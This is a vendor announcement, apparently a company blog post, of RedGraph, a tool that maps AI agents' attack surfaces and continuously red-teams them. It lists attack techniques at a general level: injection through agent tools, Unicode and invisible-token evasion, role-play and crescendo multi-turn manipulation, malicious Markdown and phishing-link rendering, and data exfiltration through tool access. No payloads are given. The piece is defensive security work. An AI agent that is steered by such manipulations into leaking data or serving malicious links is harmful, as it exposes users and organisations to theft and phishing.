Pillar Security Unveils RedGraph: The World’s First Attack Surface Mapping & Continuous Testing for AI Agents

By Dor Sarig and Ziv Karliner

December 10, 2025

Today we're excited to announce RedGraph, the world's first attack surface mapping and testing tool for AI agents that enables security teams to discover and validate real exploits in their AI agents continuously. It interacts with AI systems through the browser and works with any web-accessible AI agent, including those built on Microsoft Copilot, Salesforce Agentforce, Google Agentspace, n8n, and more. All findings are exploit-validated and flow directly into Pillar's adaptive guardrails, creating a closed loop where defenses improve continuously alongside the testing. 

Why we built it

Security teams own AI agent security, but current tools only test AI models in isolation, divorced from the databases, APIs, tools, and internal data they connect to once deployed. This creates a complex attack surface that existing security testing completely misses. Traditional AI red teaming might give a clean bill of health for the model itself, but it can't see the business logic flaws and attack paths that emerge from the agent's real-world integrations.

RedGraph takes a fundamentally different approach: by directly interacting with your AI agent in its actual environment at runtime, it maps the entire attack surface - every connection, every permission, every potential pivot point from prompt to backend system - then feeds those findings into adaptive guardrails for immediate remediation.

We built RedGraph together with our customers - based on their insights, feedback, and real challenges. They're already using it in production:

“We have numerous AI initiatives throughout the company. Unlike traditional red teaming, RedGraph continuously validates vulnerabilities in our AI agents' attack surface in production, providing complete attack paths that the engineering team can fix immediately. This marks a significant improvement in our security measures,” said Tomer Maman, CISO at Similarweb, a Pillar Security customer.

Discover Attack Path with Pillar RedGraph

Why This Changes the Game for Security Teams

How it works: 

RedGraph performs active reconnaissance to build a threat model of your specific business logic, then launches coordinated, multi-turn attacks to exploit system-level vulnerabilities. It bridges the gap between technical complexity and business oversight, allowing stakeholders to see exactly how an AI agent can compromise the organization.

This approach delivers four critical advantages:

1. Low Friction, High Visibility.

Security shouldn't be a black box accessible only to engineers. RedGraph creates a low-friction method for implementing red team assessments. Simply provide a target URL or authenticate like a real user, and RedGraph handles the rest, making continuous AI security accessible to non-technical stakeholders.

Zero-Code Integration: Connect via URL or user authentication

2. We Map the Kill Chain, Not Just the Assets.

Most tools give you a list of fuzzed prompts. RedGraph gives you a living map. It visualizes the complex web of your AI estate, showing exactly which agent can call which tool and where those tools connect to external systems. This graph-first view reveals the attack paths that actually matter.

Context-Aware Mapping: Spot logic flaws in real-world integrations

3. We Don't Guess. We Exploit.

This is the critical difference. RedGraph doesn't just flag that your "fetch_website" tool might be vulnerable to injection - it actively attempts to exploit it. The adversarial agents probe your application, pivot when blocked, and find the cracks in your business logic.

Exploitable Risk Focus: Validate real threats, ignore theoretical noise

4. We Hand You the Fix.

Security teams are tired of fighting with developers over theoretical risks. With RedGraph, you get exploit-validated proof. You can hand your engineering team a transcript and supporting evidence showing exactly how the attack happened. Better yet, these findings feed directly into Pillar's adaptive guardrails, allowing you to automatically harden the system against the specific attack vectors RedGraph discovered.

Evidence-Based Remediation: Fix fast with full attack transcripts

Key Capabilities

Graph-First Attack-Path View

RedGraph represents your AI estate as nodes (assistants, agents, roles, tools, MCP servers, datasets, SaaS apps) and edges (can-call, can-read, can-render, has-permission). This illuminates unintended relationships and the paths they enable, showing you where real risk accumulates.
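To make the node-and-edge idea concrete, here is a minimal Python sketch of a typed graph and a search for paths between two nodes. It is an illustration only, not RedGraph's implementation: the node names (`support_agent`, `crm_connector`, `customer_records`, and so on) and the helper functions are hypothetical, and only the edge labels come from the list above.

```python
from collections import defaultdict

# Hypothetical AI estate: every node name here is made up for illustration.
# Edge labels reuse the relationship types named in the text.
EDGES = [
    ("support_agent", "can-call", "fetch_website"),
    ("support_agent", "can-call", "crm_connector"),
    ("crm_connector", "can-read", "customer_records"),
    ("fetch_website", "can-render", "chat_ui"),
]


def build_graph(edges):
    """Index edges by source node: source -> [(relation, target), ...]."""
    graph = defaultdict(list)
    for source, relation, target in edges:
        graph[source].append((relation, target))
    return graph


def attack_paths(graph, start, goal):
    """Return every simple path from start to goal as a list of hops.

    Each hop is a (source, relation, target) tuple. Nodes already on the
    current path are skipped, so cycles cannot cause infinite loops.
    """
    paths = []
    stack = [(start, [], {start})]
    while stack:
        node, hops, seen = stack.pop()
        if node == goal:
            paths.append(hops)
            continue
        for relation, target in graph.get(node, []):
            if target not in seen:
                stack.append((target, hops + [(node, relation, target)], seen | {target}))
    return paths


graph = build_graph(EDGES)
for path in attack_paths(graph, "support_agent", "customer_records"):
    print(" -> ".join(f"{s} [{r}] {t}" for s, r, t in path))
```

In this toy estate the only route from the agent to the dataset runs through the CRM connector, which is the kind of relationship a graph view makes visible and a flat asset list does not.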

Business Context Awareness

RedGraph doesn't launch blind attacks. It applies application context to find business logic flaws, prioritize what matters, and map results directly to your threat landscape - minimizing noise and maximizing relevance.

Real-Time Adaptability

During assessments, agents dynamically adjust their tactics. If a path is blocked, they pivot, mirroring real attacker behavior so that if there's a way in, RedGraph will find it, even as systems evolve.

What RedGraph Tests

RedGraph blends AI-specific risk analysis with web application security, providing visibility into the real-world weaknesses of agentic systems.

AI Model-Based Risks:

  • Threat-surface mapping: Reveals hidden roles, tools, capabilities, and unintended pathways the AI can reach
  • Attack-path flow analysis: Uses a graph view of your workflows to spot chained manipulations and multi-turn escalation attempts, then validates the path end-to-end
  • Evasion & deception: Exercises Unicode tricks, invisible tokens, adversarial formatting, role-play social engineering, and crescendo (multi-turn) sequences to pressure-test defenses
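
As a small illustration of the "invisible tokens" item above, the Python sketch below lists Unicode format characters (general category `Cf`, which includes zero-width spaces and bidirectional overrides) hidden in a prompt. It is an assumption-laden example of one narrow check, not a description of how RedGraph generates or detects evasions; the function name and the sample string are hypothetical.

```python
import unicodedata


def find_invisible_chars(text):
    """Return (index, codepoint, name) for each Unicode format (Cf) character."""
    findings = []
    for index, char in enumerate(text):
        if unicodedata.category(char) == "Cf":
            name = unicodedata.name(char, "UNKNOWN")
            findings.append((index, f"U+{ord(char):04X}", name))
    return findings


# Hypothetical prompt with a zero-width space and a right-to-left override.
sample = "Ignore\u200b previous\u202e instructions"
for finding in find_invisible_chars(sample):
    print(finding)
```

A check like this covers only one of the evasion classes listed; adversarial formatting, role-play, and multi-turn sequences need testing against the live agent.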

Web Application Risks:

  • Unsafe markdown rendering: Detects when the AI can be manipulated into generating malicious Markdown or code blocks that execute XSS payloads within the user interface
  • Malicious link rendering: Finds cases where the agent is coerced into hallucinating or serving phishing URLs that the application renders as trusted, clickable links
  • Data-exfiltration vectors: Exercises how the agent’s legitimate access to tools (like file uploads or API connectors) can be hijacked to bypass controls and leak sensitive context
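
The rendering risks above can be sketched as a simple output check. The Python example below scans agent-generated Markdown for links and images that use a non-HTTP scheme or point at a host outside an allowlist. It is a rough sketch under stated assumptions: the allowlist, the regular expression, and the sample text are all hypothetical, the pattern handles only basic inline Markdown links, and none of this is presented as RedGraph's own logic.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the application is willing to render.
TRUSTED_HOSTS = {"example.com"}

# Matches inline Markdown links and images: [label](url) and ![alt](url).
LINK_PATTERN = re.compile(r"(!?)\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def risky_links(markdown):
    """Return (url, reason) pairs for links and images that look unsafe."""
    findings = []
    for match in LINK_PATTERN.finditer(markdown):
        is_image, _label, url = match.groups()
        parsed = urlparse(url)
        scheme = parsed.scheme.lower()
        host = (parsed.hostname or "").lower()
        if scheme and scheme not in ("http", "https"):
            # e.g. javascript: or data: URLs that may execute in the UI
            findings.append((url, "non-http scheme"))
        elif host and host not in TRUSTED_HOSTS:
            # Auto-loaded images can leak data through their query string.
            reason = "untrusted image host" if is_image else "untrusted link host"
            findings.append((url, reason))
    return findings


sample = (
    "See [our docs](https://example.com/docs), "
    "[reset your password](https://examp1e-login.test/reset), "
    "![status](https://attacker.test/pixel.png?d=SECRET) and "
    "[click](javascript:alert%281%29)."
)
for url, reason in risky_links(sample):
    print(reason, url)
```

Static checks like this catch known patterns; the point of exploit validation is to confirm whether the application actually renders such output as trusted content.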

Advanced, Effective, and Built for the Agentic Era

We built RedGraph on a simple premise: the best defense against autonomous AI systems is an autonomous adversary. This is the world's first AI Attack Surface Management capability embedded within a comprehensive security platform, creating something fundamentally new. This approach delivers a recursive defense model where offense and defense evolve together. Every vulnerability RedGraph discovers flows directly into Pillar's adaptive guardrails, transforming your security posture from static protection into a living system that learns and strengthens with every assessment.

RedGraph is available now and already in use at Fortune 500 and other innovative companies. Visit pillar.security/redgraph to schedule a demonstration, or contact sales@pillar.security.
